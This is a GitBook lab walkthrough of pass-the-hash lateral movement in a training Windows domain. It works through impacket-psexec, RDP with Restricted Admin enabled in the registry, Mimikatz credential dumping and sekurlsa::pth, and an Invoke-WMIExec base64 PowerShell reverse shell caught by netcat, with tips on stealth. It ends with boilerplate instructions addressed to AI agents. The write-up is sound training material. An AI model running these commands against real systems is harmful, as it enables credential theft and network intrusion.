> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-hash-pth/questions.md).

# Questions

## Pass the Hash — Lab Walkthrough

### Environment

| Host | Role              | IP          |
| ---- | ----------------- | ----------- |
| MS01 | Foothold machine  | 172.16.1.5  |
| DC01 | Domain Controller | 172.16.1.10 |

**Starting hash:** `Administrator:30B3783CE2ABF1AF70F77D0660CF3453`

***

### Q1 — Initial Access via PtH

Used `impacket-psexec` to authenticate with the Administrator NTLM hash and get an interactive shell.

```bash
impacket-psexec administrator@10.129.97.66 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

```cmd
type C:\pth.txt
```

**Flag:** `G3t_4CCE$$_V1@_PTH`

***

### Q2 — RDP via PtH

RDP PtH requires **Restricted Admin Mode** enabled on the target. The registry value that controls this is `DisableRestrictedAdmin` — must be set to `0`.

**Enable Restricted Admin Mode (from existing shell):**

```cmd
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
```

**Connect via RDP with hash:**

```bash
xfreerdp /v:10.129.97.66 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453
```

**Answer:** `DisableRestrictedAdmin`

***

### Q3 — Extract Hashes with Mimikatz (from RDP session)

Once inside the RDP session, navigate to `C:\tools` and run Mimikatz.

```cmd
cd C:\tools
mimikatz.exe
```

```
privilege::debug
sekurlsa::logonpasswords
```

Look for David's entry in the output:

```
Username : david
Domain   : INLANEFREIGHT
NTLM     : c39f2beb3d2ec06a62cb887fb391dee0
```

**David's NTLM hash:** `c39f2beb3d2ec06a62cb887fb391dee0`

***

### Q4 — Access David's Share via PtH

Use Mimikatz `sekurlsa::pth` to spawn a new cmd.exe running under David's security context, then access the share directly.

```cmd
mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe"
```

A new cmd window opens as David. From there:

```cmd
dir \\dc01\david
type \\dc01\david\david.txt
```

**Flag:** `D3V1d_Fl5g_is_Her3`

***

### Q5 — Access Julio's Share via PtH

Repeat the Mimikatz `sekurlsa::logonpasswords` dump to get Julio's hash, then use `sekurlsa::pth` the same way.

```cmd
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe"
```

```cmd
type \\dc01\julio\julio.txt
```

**Flag:** `JuL1()_SH@re_fl@g`

***

### Q6 — Reverse Shell from DC01 via Invoke-TheHash

**Scenario:** MS01 can reach DC01, but your Pwnbox cannot. Use MS01 as a pivot — force DC01 to call back to MS01 with a reverse shell.

#### Step 1 — Open Two PowerShell Windows on MS01

* **Window A:** `C:\tools\Invoke-TheHash\` — runs the attack
* **Window B:** `C:\tools\` — runs the netcat listener

#### Step 2 — Start Listener (Window B)

```powershell
.\nc.exe -lvp 4444
```

#### Step 3 — Get MS01's Internal IP

```powershell
ipconfig
# Note the internal NIC IP: 172.16.1.5
# DC01 must call back to this IP, not your Pwnbox
```

#### Step 4 — Generate Reverse Shell Payload

Go to [revshells.com](https://www.revshells.com/):

* LHOST: `172.16.1.5`
* LPORT: `4444`
* Type: **PowerShell #3 (Base64)**

Copy the generated Base64 command.

#### Step 5 — Execute via Invoke-TheHash (Window A)

```powershell
Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <Base64_payload>"
```

#### Step 6 — Catch Shell and Read Flag (Window B)

Reverse shell connects back to the netcat listener.

```cmd
type C:\julio\flag.txt
```

**Flag:** `JuL1()_N3w_fl@g`

***

### Full Attack Chain

```
impacket-psexec (hash) → MS01 shell
        │
        └── Enable DisableRestrictedAdmin
                │
                └── xfreerdp /pth → RDP session on MS01
                        │
                        └── Mimikatz sekurlsa::logonpasswords
                                │
                                ├── david hash → sekurlsa::pth → \\dc01\david
                                └── julio hash → sekurlsa::pth → \\dc01\julio
                                        │
                                        └── Invoke-WMIExec (julio hash)
                                                → DC01 reverse shell → MS01:4444
                                                        → C:\julio\flag.txt
```

***

### Key Takeaways

* `sekurlsa::logonpasswords` dumps all hashes from **currently logged-in sessions** — run it after getting RDP/shell access to harvest lateral movement material
* `sekurlsa::pth` spawns a process in the target user's context without touching their plaintext password — the new window inherits their token
* **Pivot awareness** — always run `ipconfig` before generating reverse shell payloads; use the interface IP that the target can actually reach, not your external IP
* WMI execution via Invoke-TheHash is stealthier than SMB — no service creation on disk
* RDP PtH requires the registry key change first — if you skip it you'll get an error about blank passwords/policy restrictions


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-lateral-movement/pass-the-hash-pth/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
